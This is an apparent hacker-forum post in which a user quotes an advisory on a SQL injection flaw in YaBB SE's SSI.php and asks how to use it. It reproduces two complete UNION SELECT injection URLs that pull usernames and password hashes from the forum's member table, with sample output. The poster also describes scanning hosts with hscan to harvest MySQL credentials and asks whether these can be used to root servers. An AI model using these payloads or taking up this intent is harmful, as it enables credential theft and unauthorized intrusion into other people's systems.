hmm this seems interesting but i dont really understand it yet...
the second link says:
Technical Details:
the file SSI.php has a number of functions that return some information
about the status of the forum like recent topics, boards statistics and so
on. Functions welcome and recentTopics are vulnerable to SQL injection
because the parameter ID_MEMBER is not checked against malicious input.
Example:
http://vulnhost/yabbse/SSI.php?function=re...&ID_MEMBER=1+OR+1=2)+LEFT+JOIN+yabbse_log_mark_read+AS+lmr+ON+(lmr.ID_BOARD
=t.ID_BOARD+AND+lmr.ID_MEMBER=1+OR+1=2)+WHERE+m.ID_
MSG+IN+(2,1)+AND+t.ID_TOPIC=m.ID_TOPIC+AND+b.ID_BOARD=
t.ID_BOARD+UNION+SELECT+ID_MEMBER,+memberName,null,passwd,
null,passwd,null,null,null,null,null,null+FROM+yabbse_members+/*
OR
http://vulnhost/yabbse/SSI.php?function=re..._MEMBER=1+OR+1=1)+LEFT+JOIN+yabbse_log_mark_read+AS+lmr+ON+(lmr.ID_BOARD=t.ID_
BOARD+AND+lmr.ID_MEMBER=1+OR+1=1)+UNION+SELECT+ID_MEM
BER,+memberName,null,passwd,null,passwd,null,null,null,null,null,null+FROM+yab
bse_members+/*
those requests return a page showing all usernames and hashed passwords.
[General Discussion] test post by test January 01, 2001, 03:00:01 pm
[] admin by [hashed pass] January 01, 1970, 01:00:01 am
[] test_user by [hashed pass] January 01, 1970, 01:00:02 am
so if u scan a vulnerable host, type this link into internet explorer u get log/pass for mysql server? but whats so good about it? i mean can i root a server with that?? scanning with hscan in the past gave me a lot of mysql usernames and passes but i cant use them for rooting servers can i?
maybe i understood sth wrong...
buzz
